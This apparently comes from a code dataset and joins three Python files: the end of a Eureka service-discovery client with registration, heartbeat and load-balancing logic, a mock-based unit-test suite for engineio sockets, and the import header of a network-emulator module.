_logger.warn(f"try eureka servers in zone[{zone}] error!", exc_info=True)
else:
return
raise EurekaServerConnectionException("All eureka servers in all zone are down!")
def __try_all_eureka_servers(self, fun):
if self.__prefer_same_zone:
try:
self.__try_eureka_server_in_zone(fun)
except EurekaServerConnectionException:
self.__try_eureka_server_not_in_zone(fun)
else:
self.__try_eureka_server_regardless_zones(fun)
def __try_eureka_servers_in_list(self, fun, eureka_servers=[], zone=_DEFAUTL_ZONE):
with self.__net_lock:
ok = False
_zone = zone if zone else _DEFAUTL_ZONE
for url in eureka_servers:
url = url.strip()
try:
_logger.debug(f"try to do {fun.__name__} in zone[{_zone}] using url {url}. ")
fun(url)
except (http_client.HTTPError, http_client.URLError):
_logger.warn(f"Eureka server [{url}] is down, use next url to try.", exc_info=True)
else:
ok = True
self.__cache_eureka_url[_zone] = url
break
if not ok:
if _zone in self.__cache_eureka_url:
del self.__cache_eureka_url[_zone]
raise EurekaServerConnectionException(f"All eureka servers in zone[{_zone}] are down!")
def __connect_to_eureka_server(self, fun):
if self.__cache_eureka_url:
try:
self.__try_eureka_server_in_cache(fun)
except EurekaServerConnectionException:
self.__try_all_eureka_servers(fun)
else:
self.__try_all_eureka_servers(fun)
@staticmethod
def __format_url(url, host, port, defalut_ctx=""):
if url != "":
if url.startswith('http'):
_url = url
elif url.startswith('/'):
_url = f'http://{host}:{port}{url}'
else:
_url = f'http://{host}:{port}/{url}'
else:
_url = f'http://{host}:{port}/{defalut_ctx}'
return _url
@staticmethod
def __is_ip(ip_str):
return re.match(r'^\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}$', ip_str)
@staticmethod
def __get_instance_ip(eureka_server):
url_obj = http_client.parse_url(eureka_server)
target_ip = url_obj["host"]
target_port = url_obj["port"]
if target_port is None:
if url_obj["schema"] == "http":
target_port = 80
else:
target_port = 443
if url_obj["ipv6"] is not None:
target_ip = url_obj["ipv6"]
socket_family = socket.AF_INET6
else:
socket_family = socket.AF_INET
s = socket.socket(socket_family, socket.SOCK_DGRAM)
s.connect((target_ip, target_port))
ip = s.getsockname()[0]
s.close()
return ip
def _on_error(self, error_type: str, exception: Exception):
if self.__on_error_callback and callable(self.__on_error_callback):
self.__on_error_callback(error_type, exception)
def register(self, status: str = INSTANCE_STATUS_UP, overriddenstatus: str = INSTANCE_STATUS_UNKNOWN) -> None:
self.__instance["status"] = status
self.__instance["overriddenstatus"] = overriddenstatus
self.__instance["lastUpdatedTimestamp"] = str(_current_time_millis())
self.__instance["lastDirtyTimestamp"] = str(_current_time_millis())
try:
def do_register(url):
_register(url, self.__instance)
self.__connect_to_eureka_server(do_register)
except Exception as e:
self.__alive = False
_logger.warn("Register error! Will try in next heartbeat. ", exc_info=True)
self._on_error(ERROR_REGISTER, e)
else:
_logger.debug("register successfully!")
self.__alive = True
def cancel(self) -> None:
try:
def do_cancel(url):
cancel(url, self.__instance["app"], self.__instance["instanceId"])
self.__connect_to_eureka_server(do_cancel)
except Exception as e:
_logger.warn("Cancel error!", exc_info=True)
self._on_error(ERROR_STATUS_UPDATE, e)
else:
self.__alive = False
def send_heartbeat(self, overridden_status: str = "") -> None:
if not self.__alive:
self.register()
return
try:
_logger.debug("sending heartbeat to eureka server. ")
def do_send_heartbeat(url):
send_heartbeat(url, self.__instance["app"],
self.__instance["instanceId"], self.__instance["lastDirtyTimestamp"],
status=self.__instance["status"], overriddenstatus=overridden_status)
self.__connect_to_eureka_server(do_send_heartbeat)
except Exception as e:
_logger.warn("Cannot send heartbeat to server, try to register. ", exc_info=True)
self._on_error(ERROR_STATUS_UPDATE, e)
self.register()
def status_update(self, new_status: str) -> None:
self.__instance["status"] = new_status
try:
def do_status_update(url):
status_update(url, self.__instance["app"], self.__instance["instanceId"],
self.__instance["lastDirtyTimestamp"], new_status)
self.__connect_to_eureka_server(do_status_update)
except Exception as e:
_logger.warn("update status error!", exc_info=True)
self._on_error(ERROR_STATUS_UPDATE, e)
def delete_status_override(self) -> None:
try:
self.__connect_to_eureka_server(lambda url: delete_status_override(
url, self.__instance["app"], self.__instance["instanceId"], self.__instance["lastDirtyTimestamp"]))
except Exception as e:
_logger.warn("delete status overrid error!", exc_info=True)
self._on_error(ERROR_STATUS_UPDATE, e)
def __start_register(self):
_logger.debug("start to registry client...")
self.register()
def __stop_registery(self):
if self.__alive:
self.register(status=INSTANCE_STATUS_DOWN)
self.cancel()
def __heartbeat(self):
while True:
if self.__should_register:
_logger.debug("sending heartbeat to eureka server ")
self.send_heartbeat()
if self.__should_discover:
_logger.debug("loading services from eureka server")
self.__fetch_delta()
time.sleep(self.__heartbeat_interval)
def __pull_full_registry(self):
def do_pull(url): # the actual function body
self.__applications = get_applications(url, self.__remote_regions)
self.__delta = self.__applications
try:
self.__connect_to_eureka_server(do_pull)
except Exception as e:
_logger.warn("pull full registry from eureka server error!", exc_info=True)
self._on_error(ERROR_DISCOVER, e)
def __fetch_delta(self):
def do_fetch(url):
if self.__applications is None or len(self.__applications.applications) == 0:
self.__pull_full_registry()
return
delta = get_delta(url, self.__remote_regions)
_logger.debug(f"delta got: v.{delta.versionsDelta}::{delta.appsHashcode}")
if self.__delta is not None \
and delta.versionsDelta == self.__delta.versionsDelta \
and delta.appsHashcode == self.__delta.appsHashcode:
return
self.__merge_delta(delta)
self.__delta = delta
if not self.__is_hash_match():
self.__pull_full_registry()
try:
self.__connect_to_eureka_server(do_fetch)
except Exception as e:
_logger.warn("fetch delta from eureka server error!", exc_info=True)
self._on_error(ERROR_DISCOVER, e)
def __is_hash_match(self):
app_hash = self.__get_applications_hash()
_logger.debug(f"check hash, local[{app_hash}], remote[{self.__delta.appsHashcode}]")
return app_hash == self.__delta.appsHashcode
def __merge_delta(self, delta):
_logger.debug(f"merge delta...length of application got from delta::{len(delta.applications)}")
for application in delta.applications:
for instance in application.instances:
_logger.debug(f"instance [{instance.instanceId}] has {instance.actionType}")
if instance.actionType in (ACTION_TYPE_ADDED, ACTION_TYPE_MODIFIED):
existingApp = self.applications.get_application(application.name)
if existingApp is None:
self.applications.add_application(application)
else:
existingApp.update_instance(instance)
elif instance.actionType == ACTION_TYPE_DELETED:
existingApp = self.applications.get_application(application.name)
if existingApp is None:
self.applications.add_application(application)
existingApp.remove_instance(instance)
def __get_applications_hash(self):
app_hash = ""
app_status_count = {}
for application in self.__applications.applications:
for instance in application.instances:
if instance.status not in app_status_count:
app_status_count[instance.status.upper()] = 0
app_status_count[instance.status.upper()] = app_status_count[instance.status.upper()] + 1
sorted_app_status_count = sorted(app_status_count.items(), key=lambda item: item[0])
for item in sorted_app_status_count:
app_hash = f"{app_hash}{item[0]}_{item[1]}_"
return app_hash
def walk_nodes_async(self,
app_name: str = "",
service: str = "",
prefer_ip: bool = False,
prefer_https: bool = False,
walker: Callable = None,
on_success: Callable = None,
on_error: Callable = None) -> None:
def async_thread_target():
try:
res = self.walk_nodes(app_name=app_name, service=service, prefer_ip=prefer_ip, prefer_https=prefer_https, walker=walker)
if on_success is not None and (inspect.isfunction(on_success) or inspect.ismethod(on_success)):
on_success(res)
except http_client.HTTPError as e:
if on_error is not None and (inspect.isfunction(on_error) or inspect.ismethod(on_error)):
on_error(e)
async_thread = Thread(target=async_thread_target)
async_thread.daemon = True
async_thread.start()
def walk_nodes(self,
app_name: str = "",
service: str = "",
prefer_ip: bool = False,
prefer_https: bool = False,
walker: Callable = None) -> Union[str, Dict, http_client.HTTPResponse]:
assert app_name is not None and app_name != "", "application_name should not be null"
assert inspect.isfunction(walker) or inspect.ismethod(walker), "walker must be a method or function"
error_nodes = []
app_name = app_name.upper()
node = self.__get_available_service(app_name)
while node is not None:
try:
url = self.__generate_service_url(node, prefer_ip, prefer_https)
if service.startswith("/"):
url = url + service[1:]
else:
url = url + service
_logger.debug("do service with url::" + url)
return walker(url)
except (http_client.HTTPError, http_client.URLError):
_logger.warn(f"do service {service} in node [{node.instanceId}] error, use next node.")
error_nodes.append(node.instanceId)
node = self.__get_available_service(app_name, error_nodes)
raise http_client.URLError("Try all up instances in registry, but all fail")
def do_service_async(self, app_name: str = "", service: str = "", return_type: str = "string",
prefer_ip: bool = False, prefer_https: bool = False,
on_success: Callable = None, on_error: Callable = None,
method: str = "GET", headers: Dict[str, str] = None,
data: Union[bytes, str, Dict] = None, timeout: float = _DEFAULT_TIME_OUT,
cafile: str = None, capath: str = None, cadefault: bool = False, context: ssl.SSLContext = None) -> None:
def async_thread_target():
try:
res = self.do_service(app_name=app_name,
service=service, return_type=return_type,
prefer_ip=prefer_ip, prefer_https=prefer_https,
method=method, headers=headers,
data=data, timeout=timeout,
cafile=cafile, capath=capath,
cadefault=cadefault, context=context)
if on_success is not None and (inspect.isfunction(on_success) or inspect.ismethod(on_success)):
on_success(res)
except http_client.HTTPError as e:
if on_error is not None and (inspect.isfunction(on_error) or inspect.ismethod(on_error)):
on_error(e)
async_thread = Thread(target=async_thread_target)
async_thread.daemon = True
async_thread.start()
def do_service(self, app_name: str = "", service: str = "", return_type: str = "string",
prefer_ip: bool = False, prefer_https: bool = False,
method: str = "GET", headers: Dict[str, str] = None,
data: Union[bytes, str, Dict] = None, timeout: float = _DEFAULT_TIME_OUT,
cafile: str = None, capath: str = None, cadefault: bool = False, context: ssl.SSLContext = None) -> Union[str, Dict, http_client.HTTPResponse]:
if data and isinstance(data, dict):
_data = json.dumps(data).encode()
elif data and isinstance(data, str):
_data = data.encode()
else:
_data = data
def walk_using_urllib(url):
req = http_client.Request(url, method=method)
heads = headers if headers is not None else {}
for k, v in heads.items():
req.add_header(k, v)
res_txt, res = http_client.load(req, data=_data, timeout=timeout, cafile=cafile, capath=capath, cadefault=cadefault, context=context)
if return_type.lower() in ("json", "dict", "dictionary"):
return json.loads(res_txt)
elif return_type.lower() == "response_object":
return res
else:
return res_txt
return self.walk_nodes(app_name, service, prefer_ip, prefer_https, walk_using_urllib)
def __get_service_not_in_ignore_list(self, instances, ignores):
ign = ignores if ignores else []
return [item for item in instances if item.instanceId not in ign]
def __get_available_service(self, application_name, ignore_instance_ids=None):
apps = self.applications
if not apps:
raise DiscoverException("Cannot load registry from eureka server, please check your configurations. ")
app = apps.get_application(application_name)
if app is None:
return None
up_instances = []
if self.__prefer_same_zone:
ups_same_zone = app.up_instances_in_zone(self.zone)
up_instances = self.__get_service_not_in_ignore_list(ups_same_zone, ignore_instance_ids)
if not up_instances:
ups_not_same_zone = app.up_instances_not_in_zone(self.zone)
_logger.debug(
f"app[{application_name}]'s up instances not in same zone are all down, using the one that's not in the same zone: {[ins.instanceId for ins in ups_not_same_zone]}")
up_instances = self.__get_service_not_in_ignore_list(ups_not_same_zone, ignore_instance_ids)
else:
up_instances = self.__get_service_not_in_ignore_list(app.up_instances, ignore_instance_ids)
if len(up_instances) == 0:
# no up instances
return None
elif len(up_instances) == 1:
# only one available instance, then doesn't matter which strategy is.
instance = up_instances[0]
self.__ha_cache[application_name] = instance.instanceId
return instance
def random_one(instances):
if len(instances) == 1:
idx = 0
else:
idx = random.randint(0, len(instances) - 1)
selected_instance = instances[idx]
self.__ha_cache[application_name] = selected_instance.instanceId
return selected_instance
if self.__ha_strategy == HA_STRATEGY_RANDOM:
return random_one(up_instances)
elif self.__ha_strategy == HA_STRATEGY_STICK:
if application_name in self.__ha_cache:
cache_id = self.__ha_cache[application_name]
cahce_instance = app.get_instance(cache_id)
if cahce_instance is not None and cahce_instance.status == INSTANCE_STATUS_UP:
return cahce_instance
else:
return random_one(up_instances)
else:
return random_one(up_instances)
elif self.__ha_strategy == HA_STRATEGY_OTHER:
if application_name in self.__ha_cache:
cache_id = self.__ha_cache[application_name]
other_instances = []
for up_instance in up_instances:
if up_instance.instanceId != cache_id:
other_instances.append(up_instance)
return random_one(other_instances)
else:
return random_one(up_instances)
else:
return None
def __generate_service_url(self, instance, prefer_ip, prefer_https):
if instance is None:
return None
schema = "http"
port = 0
if instance.port.port and not instance.securePort.enabled:
schema = "http"
port = instance.port.port
elif not instance.port.port and instance.securePort.enabled:
schema = "https"
port = instance.securePort.port
elif instance.port.port and instance.securePort.enabled:
if prefer_https:
schema = "https"
port = instance.securePort.port
else:
schema = "http"
port = instance.port.port
else:
assert False, "generate_service_url error: No port is available"
host = instance.ipAddr if prefer_ip else instance.hostName
return f"{schema}://{host}:{port}/"
def __start_discover(self):
self.__pull_full_registry()
def start(self) -> None:
if self.should_register:
self.__start_register()
if self.should_discover:
self.__start_discover()
self.__heartbeat_timer.start()
def stop(self) -> None:
if self.__heartbeat_timer.is_alive():
self.__heartbeat_timer.cancel()
if self.__should_register:
self.__stop_registery()
__cache_key = "default"
__cache_clients = {}
__cache_clients_lock = RLock()
def init(eureka_server: str = _DEFAULT_EUREKA_SERVER_URL,
eureka_domain: str = "",
region: str = "",
zone: str = "",
eureka_availability_zones: Dict[str, str] = {},
eureka_protocol: str = "http",
eureka_basic_auth_user: str = "",
eureka_basic_auth_password: str = "",
eureka_context: str = "/eureka",
prefer_same_zone: bool = True,
should_register: bool = True,
should_discover: bool = True,
on_error: Callable = None,
app_name: str = "",
instance_id: str = "",
instance_host: str = "",
instance_ip: str = "",
instance_ip_network: str = "",
instance_port: int = _DEFAULT_INSTNACE_PORT,
instance_unsecure_port_enabled: bool = True,
instance_secure_port: int = _DEFAULT_INSTNACE_SECURE_PORT,
instance_secure_port_enabled: bool = False,
data_center_name: str = _DEFAULT_DATA_CENTER_INFO, # Netflix, Amazon, MyOwn
renewal_interval_in_secs: int = _RENEWAL_INTERVAL_IN_SECS,
duration_in_secs: int = _DURATION_IN_SECS,
home_page_url: str = "",
status_page_url: str = "",
health_check_url: str = "",
secure_health_check_url: str = "",
vip_adr: str = "",
secure_vip_addr: str = "",
is_coordinating_discovery_server: bool = False,
metadata: Dict = {},
remote_regions: List[str] = [],
ha_strategy: int = HA_STRATEGY_RANDOM) -> EurekaClient:
"""
Initialize an EurekaClient object and put it to cache, you can use a set of functions to do the service.
Unlike using EurekaClient class that you need to start and stop the client object by yourself, this method
will start the client automatically after the object created and stop it when the programe exist.
read EurekaClient for more information for the parameters details.
"""
with __cache_clients_lock:
if __cache_key in __cache_clients:
_logger.warn("A client is already running, try to stop it and start the new one!")
__cache_clients[__cache_key].stop()
del __cache_clients[__cache_key]
client = EurekaClient(eureka_server=eureka_server,
eureka_domain=eureka_domain,
region=region,
zone=zone,
eureka_availability_zones=eureka_availability_zones,
eureka_protocol=eureka_protocol,
eureka_basic_auth_user=eureka_basic_auth_user,
eureka_basic_auth_password=eureka_basic_auth_password,
eureka_context=eureka_context,
prefer_same_zone=prefer_same_zone,
should_register=should_register,
should_discover=should_discover,
on_error=on_error,
app_name=app_name,
instance_id=instance_id,
instance_host=instance_host,
instance_ip=instance_ip,
instance_ip_network=instance_ip_network,
instance_port=instance_port,
instance_unsecure_port_enabled=instance_unsecure_port_enabled,
instance_secure_port=instance_secure_port,
instance_secure_port_enabled=instance_secure_port_enabled,
data_center_name=data_center_name,
renewal_interval_in_secs=renewal_interval_in_secs,
duration_in_secs=duration_in_secs,
home_page_url=home_page_url,
status_page_url=status_page_url,
health_check_url=health_check_url,
secure_health_check_url=secure_health_check_url,
vip_adr=vip_adr,
secure_vip_addr=secure_vip_addr,
is_coordinating_discovery_server=is_coordinating_discovery_server,
metadata=metadata,
remote_regions=remote_regions,
ha_strategy=ha_strategy)
__cache_clients[__cache_key] = client
client.start()
return client
def get_client() -> EurekaClient:
with __cache_clients_lock:
if __cache_key in __cache_clients:
return __cache_clients[__cache_key]
else:
return None
def walk_nodes_async(app_name: str = "",
service: str = "",
prefer_ip: bool = False,
prefer_https: bool = False,
walker: Callable = None,
on_success: Callable = None,
on_error: Callable = None) -> None:
cli = get_client()
if cli is None:
raise Exception("Discovery Client has not initialized. ")
cli.walk_nodes_async(app_name=app_name, service=service,
prefer_ip=prefer_ip, prefer_https=prefer_https,
walker=walker, on_success=on_success, on_error=on_error)
def walk_nodes(app_name: str = "",
service: str = "",
prefer_ip: bool = False,
prefer_https: bool = False,
walker: Callable = None) -> Union[str, Dict, http_client.HTTPResponse]:
cli = get_client()
if cli is None:
raise Exception("Discovery Client has not initialized. ")
return cli.walk_nodes(app_name=app_name, service=service,
prefer_ip=prefer_ip, prefer_https=prefer_https, walker=walker)
def do_service_async(app_name: str = "", service: str = "", return_type: str = "string",
prefer_ip: bool = False, prefer_https: bool = False,
on_success: Callable = None, on_error: Callable = None,
method: str = "GET", headers: Dict[str, str] = None,
data: Union[bytes, str, Dict] = None, timeout: float = _DEFAULT_TIME_OUT,
cafile: str = None, capath: str = None, cadefault: bool = False, context: ssl.SSLContext = None) -> None:
cli = get_client()
if cli is None:
raise Exception("Discovery Client has not initialized. ")
cli.do_service_async(app_name=app_name, service=service, return_type=return_type,
prefer_ip=prefer_ip, prefer_https=prefer_https,
on_success=on_success, on_error=on_error,
method=method, headers=headers,
data=data, timeout=timeout,
cafile=cafile, capath=capath,
cadefault=cadefault, context=context)
def do_service(app_name: str = "", service: str = "", return_type: str = "string",
prefer_ip: bool = False, prefer_https: bool = False,
method: str = "GET", headers: Dict[str, str] = None,
data: Union[bytes, str, Dict] = None, timeout: float = _DEFAULT_TIME_OUT,
cafile: str = None, capath: str = None, cadefault: bool = False, context: ssl.SSLContext = None) -> Union[str, Dict, http_client.HTTPResponse]:
cli = get_client()
if cli is None:
raise Exception("Discovery Client has not initialized. ")
return cli.do_service(app_name=app_name, service=service, return_type=return_type,
prefer_ip=prefer_ip, prefer_https=prefer_https,
method=method, headers=headers,
data=data, timeout=timeout,
cafile=cafile, capath=capath,
cadefault=cadefault, context=context)
def stop() -> None:
client = get_client()
if client is not None:
client.stop()
@atexit.register
def _cleanup_before_exist():
if len(__cache_clients) > 0:
_logger.debug("cleaning up clients")
for k, cli in __cache_clients.items():
_logger.debug(f"try to stop cache client [{k}] this will also unregister this client from the eureka server")
cli.stop()
|
test_socket.py
|
import time
import unittest
import six
if six.PY3:
from unittest import mock
else:
import mock
from engineio import packet
from engineio import payload
from engineio import socket
class TestSocket(unittest.TestCase):
def setUp(self):
self.bg_tasks = []
def _get_mock_server(self):
mock_server = mock.Mock()
mock_server.ping_timeout = 0.2
mock_server.ping_interval = 0.2
mock_server.async_handlers = True
try:
import queue
except ImportError:
import Queue as queue
import threading
mock_server.async = {'threading': threading,
'thread_class': 'Thread',
'queue': queue,
'queue_class': 'Queue',
'websocket': None}
def bg_task(target, *args, **kwargs):
th = threading.Thread(target=target, args=args, kwargs=kwargs)
self.bg_tasks.append(th)
th.start()
return th
mock_server.start_background_task = bg_task
return mock_server
def _join_bg_tasks(self):
for task in self.bg_tasks:
task.join()
def test_create(self):
mock_server = self._get_mock_server()
s = socket.Socket(mock_server, 'sid')
self.assertEqual(s.server, mock_server)
self.assertEqual(s.sid, 'sid')
self.assertFalse(s.upgraded)
self.assertFalse(s.closed)
self.assertTrue(hasattr(s.queue, 'get'))
self.assertTrue(hasattr(s.queue, 'put'))
self.assertTrue(hasattr(s.queue, 'task_done'))
self.assertTrue(hasattr(s.queue, 'join'))
def test_empty_poll(self):
mock_server = self._get_mock_server()
s = socket.Socket(mock_server, 'sid')
self.assertRaises(IOError, s.poll)
def test_poll(self):
mock_server = self._get_mock_server()
s = socket.Socket(mock_server, 'sid')
pkt1 = packet.Packet(packet.MESSAGE, data='hello')
pkt2 = packet.Packet(packet.MESSAGE, data='bye')
s.send(pkt1)
s.send(pkt2)
self.assertEqual(s.poll(), [pkt1, pkt2])
def test_ping_pong(self):
mock_server = self._get_mock_server()
s = socket.Socket(mock_server, 'sid')
s.receive(packet.Packet(packet.PING, data='abc'))
r = s.poll()
self.assertEqual(len(r), 1)
self.assertTrue(r[0].encode(), b'3abc')
def test_message_async_handler(self):
mock_server = self._get_mock_server()
s = socket.Socket(mock_server, 'sid')
s.receive(packet.Packet(packet.MESSAGE, data='foo'))
mock_server._trigger_event.assert_called_once_with('message', 'sid',
'foo', async=True)
def test_message_sync_handler(self):
mock_server = self._get_mock_server()
mock_server.async_handlers = False
s = socket.Socket(mock_server, 'sid')
s.receive(packet.Packet(packet.MESSAGE, data='foo'))
mock_server._trigger_event.assert_called_once_with('message', 'sid',
'foo', async=False)
def test_invalid_packet(self):
mock_server = self._get_mock_server()
s = socket.Socket(mock_server, 'sid')
self.assertRaises(ValueError, s.receive, packet.Packet(packet.OPEN))
def test_timeout(self):
mock_server = self._get_mock_server()
mock_server.ping_interval = -0.1
s = socket.Socket(mock_server, 'sid')
s.last_ping = time.time() - 1
s.close = mock.MagicMock()
s.send('packet')
s.close.assert_called_once_with(wait=False, abort=True)
def test_polling_read(self):
mock_server = self._get_mock_server()
s = socket.Socket(mock_server, 'foo')
pkt1 = packet.Packet(packet.MESSAGE, data='hello')
pkt2 = packet.Packet(packet.MESSAGE, data='bye')
s.send(pkt1)
s.send(pkt2)
environ = {'REQUEST_METHOD': 'GET', 'QUERY_STRING': 'sid=foo'}
start_response = mock.MagicMock()
packets = s.handle_get_request(environ, start_response)
self.assertEqual(packets, [pkt1, pkt2])
def test_polling_read_error(self):
mock_server = self._get_mock_server()
s = socket.Socket(mock_server, 'foo')
environ = {'REQUEST_METHOD': 'GET', 'QUERY_STRING': 'sid=foo'}
start_response = mock.MagicMock()
self.assertRaises(IOError, s.handle_get_request, environ,
start_response)
def test_polling_write(self):
mock_server = self._get_mock_server()
mock_server.max_http_buffer_size = 1000
pkt1 = packet.Packet(packet.MESSAGE, data='hello')
pkt2 = packet.Packet(packet.MESSAGE, data='bye')
p = payload.Payload(packets=[pkt1, pkt2]).encode()
s = socket.Socket(mock_server, 'foo')
s.receive = mock.MagicMock()
environ = {'REQUEST_METHOD': 'POST', 'QUERY_STRING': 'sid=foo',
'CONTENT_LENGTH': len(p), 'wsgi.input': six.BytesIO(p)}
s.handle_post_request(environ)
self.assertEqual(s.receive.call_count, 2)
def test_polling_write_too_large(self):
mock_server = self._get_mock_server()
pkt1 = packet.Packet(packet.MESSAGE, data='hello')
pkt2 = packet.Packet(packet.MESSAGE, data='bye')
p = payload.Payload(packets=[pkt1, pkt2]).encode()
mock_server.max_http_buffer_size = len(p) - 1
s = socket.Socket(mock_server, 'foo')
s.receive = mock.MagicMock()
environ = {'REQUEST_METHOD': 'POST', 'QUERY_STRING': 'sid=foo',
'CONTENT_LENGTH': len(p), 'wsgi.input': six.BytesIO(p)}
self.assertRaises(ValueError, s.handle_post_request, environ)
def test_upgrade_handshake(self):
mock_server = self._get_mock_server()
s = socket.Socket(mock_server, 'foo')
s._upgrade_websocket = mock.MagicMock()
environ = {'REQUEST_METHOD': 'GET', 'QUERY_STRING': 'sid=foo',
'HTTP_CONNECTION': 'Foo,Upgrade,Bar',
'HTTP_UPGRADE': 'websocket'}
start_response = mock.MagicMock()
s.handle_get_request(environ, start_response)
s._upgrade_websocket.assert_called_once_with(environ, start_response)
def test_upgrade(self):
mock_server = self._get_mock_server()
mock_server.async['websocket'] = mock.MagicMock()
mock_server.async['websocket_class'] = 'WebSocket'
mock_ws = mock.MagicMock()
mock_server.async['websocket'].WebSocket.configure_mock(
return_value=mock_ws)
s = socket.Socket(mock_server, 'sid')
s.connected = True
environ = "foo"
start_response = "bar"
s._upgrade_websocket(environ, start_response)
mock_server.async['websocket'].WebSocket.assert_called_once_with(
s._websocket_handler)
mock_ws.assert_called_once_with(environ, start_response)
def test_upgrade_twice(self):
mock_server = self._get_mock_server()
mock_server.async['websocket'] = mock.MagicMock()
s = socket.Socket(mock_server, 'sid')
s.connected = True
s.upgraded = True
environ = "foo"
start_response = "bar"
self.assertRaises(IOError, s._upgrade_websocket,
environ, start_response)
def test_upgrade_packet(self):
mock_server = self._get_mock_server()
s = socket.Socket(mock_server, 'sid')
s.connected = True
s.receive(packet.Packet(packet.UPGRADE))
r = s.poll()
self.assertEqual(len(r), 1)
self.assertEqual(r[0].encode(), packet.Packet(packet.NOOP).encode())
def test_upgrade_no_probe(self):
mock_server = self._get_mock_server()
s = socket.Socket(mock_server, 'sid')
s.connected = True
ws = mock.MagicMock()
ws.wait.return_value = packet.Packet(packet.NOOP).encode(
always_bytes=False)
s._websocket_handler(ws)
self.assertFalse(s.upgraded)
def test_upgrade_no_upgrade_packet(self):
mock_server = self._get_mock_server()
s = socket.Socket(mock_server, 'sid')
s.connected = True
s.queue.join = mock.MagicMock(return_value=None)
ws = mock.MagicMock()
probe = six.text_type('probe')
ws.wait.side_effect = [
packet.Packet(packet.PING, data=probe).encode(
always_bytes=False),
packet.Packet(packet.NOOP).encode(always_bytes=False)]
s._websocket_handler(ws)
ws.send.assert_called_once_with(packet.Packet(
packet.PONG, data=probe).encode(always_bytes=False))
self.assertEqual(s.queue.get().packet_type, packet.NOOP)
self.assertFalse(s.upgraded)
def test_upgrade_not_supported(self):
mock_server = self._get_mock_server()
mock_server.async['websocket'] = None
mock_server.async['websocket_class'] = None
s = socket.Socket(mock_server, 'sid')
s.connected = True
environ = "foo"
start_response = "bar"
s._upgrade_websocket(environ, start_response)
mock_server._bad_request.assert_called_once_with()
def test_websocket_read_write(self):
mock_server = self._get_mock_server()
s = socket.Socket(mock_server, 'sid')
s.connected = False
s.queue.join = mock.MagicMock(return_value=None)
foo = six.text_type('foo')
bar = six.text_type('bar')
s.poll = mock.MagicMock(side_effect=[
[packet.Packet(packet.MESSAGE, data=bar)], IOError])
ws = mock.MagicMock()
ws.wait.side_effect = [
packet.Packet(packet.MESSAGE, data=foo).encode(
always_bytes=False),
None]
s._websocket_handler(ws)
self._join_bg_tasks()
self.assertTrue(s.connected)
self.assertTrue(s.upgraded)
self.assertEqual(mock_server._trigger_event.call_count, 2)
mock_server._trigger_event.assert_has_calls([
mock.call('message', 'sid', 'foo', async=True),
mock.call('disconnect', 'sid', async=False)])
ws.send.assert_called_with('4bar')
def test_websocket_upgrade_read_write(self):
mock_server = self._get_mock_server()
s = socket.Socket(mock_server, 'sid')
s.connected = True
s.queue.join = mock.MagicMock(return_value=None)
foo = six.text_type('foo')
bar = six.text_type('bar')
probe = six.text_type('probe')
s.poll = mock.MagicMock(side_effect=[
[packet.Packet(packet.MESSAGE, data=bar)], IOError])
ws = mock.MagicMock()
ws.wait.side_effect = [
packet.Packet(packet.PING, data=probe).encode(
always_bytes=False),
packet.Packet(packet.UPGRADE).encode(always_bytes=False),
packet.Packet(packet.MESSAGE, data=foo).encode(
always_bytes=False),
None]
s._websocket_handler(ws)
self._join_bg_tasks()
self.assertTrue(s.upgraded)
self.assertEqual(mock_server._trigger_event.call_count, 2)
mock_server._trigger_event.assert_has_calls([
mock.call('message', 'sid', 'foo', async=True),
mock.call('disconnect', 'sid', async=False)])
ws.send.assert_called_with('4bar')
def test_websocket_upgrade_with_payload(self):
mock_server = self._get_mock_server()
s = socket.Socket(mock_server, 'sid')
s.connected = True
s.queue.join = mock.MagicMock(return_value=None)
probe = six.text_type('probe')
ws = mock.MagicMock()
ws.wait.side_effect = [
packet.Packet(packet.PING, data=probe).encode(
always_bytes=False),
packet.Packet(packet.UPGRADE, data=b'2').encode(
always_bytes=False)]
s._websocket_handler(ws)
self._join_bg_tasks()
self.assertTrue(s.upgraded)
def test_websocket_read_write_fail(self):
mock_server = self._get_mock_server()
s = socket.Socket(mock_server, 'sid')
s.connected = False
s.queue.join = mock.MagicMock(return_value=None)
foo = six.text_type('foo')
bar = six.text_type('bar')
s.poll = mock.MagicMock(side_effect=[
[packet.Packet(packet.MESSAGE, data=bar)],
[packet.Packet(packet.MESSAGE, data=bar)], IOError])
ws = mock.MagicMock()
ws.wait.side_effect = [
packet.Packet(packet.MESSAGE, data=foo).encode(
always_bytes=False),
RuntimeError]
ws.send.side_effect = [None, RuntimeError]
s._websocket_handler(ws)
self._join_bg_tasks()
self.assertEqual(s.closed, True)
def test_websocket_ignore_invalid_packet(self):
mock_server = self._get_mock_server()
s = socket.Socket(mock_server, 'sid')
s.connected = False
s.queue.join = mock.MagicMock(return_value=None)
foo = six.text_type('foo')
bar = six.text_type('bar')
s.poll = mock.MagicMock(side_effect=[
[packet.Packet(packet.MESSAGE, data=bar)], IOError])
ws = mock.MagicMock()
ws.wait.side_effect = [
packet.Packet(packet.OPEN).encode(always_bytes=False),
packet.Packet(packet.MESSAGE, data=foo).encode(
always_bytes=False),
None]
s._websocket_handler(ws)
self._join_bg_tasks()
self.assertTrue(s.connected)
self.assertEqual(mock_server._trigger_event.call_count, 2)
mock_server._trigger_event.assert_has_calls([
mock.call('message', 'sid', foo, async=True),
mock.call('disconnect', 'sid', async=False)])
ws.send.assert_called_with('4bar')
def test_send_after_close(self):
mock_server = self._get_mock_server()
s = socket.Socket(mock_server, 'sid')
s.close(wait=False)
self.assertRaises(IOError, s.send, packet.Packet(packet.NOOP))
def test_close_after_close(self):
mock_server = self._get_mock_server()
s = socket.Socket(mock_server, 'sid')
s.close(wait=False)
self.assertTrue(s.closed)
self.assertEqual(mock_server._trigger_event.call_count, 1)
mock_server._trigger_event.assert_called_once_with('disconnect', 'sid',
async=False)
s.close()
self.assertEqual(mock_server._trigger_event.call_count, 1)
def test_close_and_wait(self):
mock_server = self._get_mock_server()
s = socket.Socket(mock_server, 'sid')
s.queue = mock.MagicMock()
s.close(wait=True)
s.queue.join.assert_called_once_with()
def test_close_without_wait(self):
mock_server = self._get_mock_server()
s = socket.Socket(mock_server, 'sid')
s.queue = mock.MagicMock()
s.close(wait=False)
self.assertEqual(s.queue.join.call_count, 0)
|
network.py
|
"""
Defines network nodes used within core.
"""
import logging
import threading
import time
from typing import TYPE_CHECKING, Callable, Dict, List, Optional, Type
import netaddr
from core import utils
from core.constants import EBTABLES_BIN, TC_BIN
from core.emulator.data import LinkData, NodeData
from core.emulator.enumerations import LinkTypes, NodeTypes, RegisterTlvs
from core.errors import CoreCommandError, CoreError
